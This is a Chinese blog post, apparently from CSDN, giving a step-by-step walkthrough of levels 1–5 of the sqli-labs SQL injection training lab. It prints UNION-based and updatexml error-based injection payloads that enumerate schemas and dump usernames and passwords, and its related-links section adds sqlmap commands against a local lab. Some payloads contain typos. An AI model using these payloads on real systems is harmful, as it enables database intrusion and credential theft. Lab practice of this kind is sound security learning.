sql靶场通关1-5题

最新推荐文章于 2024-07-01 10:20:33 发布
最新推荐文章于 2024-07-01 10:20:33 发布
阅读量967 收藏 22
点赞数 24
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80050903/article/details/135868021
版权

第一题

打开第一题出现以下界面

题目界面上说请输入数字值的参数作为id

那么就先输入?id=1来试验一下

出现以下界面,回显正常

然后输入?id=1',出现以下界面,判断出这是字符型漏洞

分别输入

?id=1' order by 3--+

?id=1' order by 4--+

判断出有三列

然后输入?id=-1' union select 1,2,3--+,查看回显

输入?id=-1' union select 1,2,database()--+

查看数据库,得到库名为security

输入?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+,得到

发现users为用户数据表,用户名和密码应该在此表中

说明下一步应该查看users表中的数据

输入?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+得到

发现有password和username

输入?id=-1' union select 1,2,group_concat(username ,id , password) from users--+得到信息

第二题

打开界面

输入?id=1,回显正常

输入?id=1',发现报错,且在报错中未看到数字,说明是数字型漏洞

输入?id=1' order by 3 --+

说明回显位有三个

输入?id=-1 union select 1,2,3--+查看回显

输入?id=-1 union select 1,2,.database(),查看数据库,得到库名为security

输入?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

得到users

输入?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users',查看users

发现有username和password

输入?id=-1 union select 1,2,group_concat(username , password) from users查看,得到信息

第三题

打开第三题

输入?id=1,回显正常

输入?id=1',报错

根据报错得知闭合方式为')

输入?id=1''),回显正常

输入?id=1') order by 3 --+查看列数,发现回显正常

输入?id=1') order by 4 --+,发现报错,说明共3列

输入?id=-1') union select 1,2,3--+,回显正常

输入?id=-1') union select 1,2,database()--+,查看数据库,得数据库名为security

输入?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+,得到users

输入?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

,查看users得到username,和password

输入?id=-1') union select 1,2,group_concat(username ,id , password) from users--+得到信息

第四题

输入?id=1,回显正常

输入?id=1',回显正常

输入?id=1\,报错,从错误回显中可知,通过  '')  闭合

输入?id=1") order by 3--+回显正常

输入?id=1") order by 4--+,报错,说明只有三列

输入?id=-1") union select 1,2,3--+

输入?id=-1") union select 1,2,,database()--+,得知数据库名为security

输入?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ,得users

输入?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ,得password和username

输入 ?id=-1") union select 1,2,group_concat(username ,id , password) from users--+,得到信息

第五题(报错注入)

输入?id=1,发现与前几题不同,没有回显

输入?id=1\,,发现为 ' 闭合

输入?id=1' and 1=1 --+,无回显

输入?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1) --+

得到库名

输入?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+

得到users

输入?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

得到表名

输入?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

得到列名

输入?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,password)from users),0x7e),1) --+

得到信息

半夜汽笛,
关注
  • 24
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqllib靶场1-5通关详解
09-24
详细记载了sqllib靶场1-5的通关
sql靶场通关8-10
09-24
sql靶场8-10详解
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3539
sqli-labs靶场通关(1-10)
SQL注入:sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 4777
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2884
sql注入
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5383
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
pikachu靶场sql注入通关教程-上)
记录学习
05-19 793
pikachu靶场通关教程-上
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7422
sqli-labs,sql注入,burpsuit
sqllabs靶场通关记录
东隅的博客
09-25 431
id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='0' %23 跑出第一张表为emails,把后面的limit 1,1 一次次换,得到四张表。id=1' and and if(ascii(substring(database(),1,1))='110',sleep(5),1) %23 跑assic码,跑出来是security。
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL语句练习-50
04-07
建表要求&查询要求
sqli-lib靶场1-15关通关教程
m0_56109788的博客
04-25 1152
sqli-lib靶场1-15关通关教程
SQL-Labs靶场“1-5”关通关教程
热门推荐
钟言的博客
02-16 1万+
本篇详细记录了SQL-Labs靶场的第一关到第五关的通关教程,详细内容包括:、准备工作 、第一关 基于GET单引号字符型注入 1、源码分析 2、联合查询注入过程 3、报错注入过程 、第二关 基于GET整型注入 1、源码分析 2、联合查询注入过程 四、第三关 基于GET单引号变形注入 1、源码分析 2、联合查询注入过程五、第四关 基于GET双引号字符型注入 1、源码分析 2、联合查询注入过程 六、第五关 基于GET单引号报错注入 1、源码分析 2、floor报错注入3、updatexml报错注入等等
自学黑客技术(网络安全
dexi1113的博客
06-24 2670
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
网络安全控制相关技术
huaqianzkh的专栏
06-28 991
网络从出现、发展演进都始终伴随着安全方面的问,只是每个阶段表现的形式不同而已。在网络安全方面,不能不提进行网络攻击的,或者说恶意代码(Malware)。所有恶意代码具有目的恶意、形态为计算机程序、通过执行发生作用的共性。实施网络攻击的恶意代码包含多种种类,主要有计算机病毒、网络蠕虫、特洛伊木马、后门、DDoS程序、僵尸进程、Rootkit、黑客攻击工具、间谍软件、广告软件、垃圾邮件,等等。
中国网络安全审查认证和市场监管大数据中心数据合规官CCRC-DCO
最新发布
2402_84109700的博客
07-01 324
CCRC-DCO证书的作用体现在多个方面。这一认证学习面向广泛的领域和专业人员,包括但不限于政府机构、司法部门、国有企业、科技与创新公司、法律会计咨询机构等,旨在提升他们在个人信息保护、数据安全、网络安全等领域的理论和实践水平。参加CCRC-DCO考试需要学习包括政策战略、法律法规、网络安全体系架构、数据安全管理、数据安全法与合规路径、个人信息保护法与合规实现、数据治理的监管司法合规应对、技术应用方案以及跨国公司的数据安全与个人信息保护合规等内容。通过名师指导和个人努力,学员有望取得理想成绩。
【等保】网络安全等级保护(等保2.0PPT)
2302_79423711的博客
06-24 858
等保2.0(网络安全等级保护基本要求的第二代标准)的推出和实施,是基于多方面的考虑和需求。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定表名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值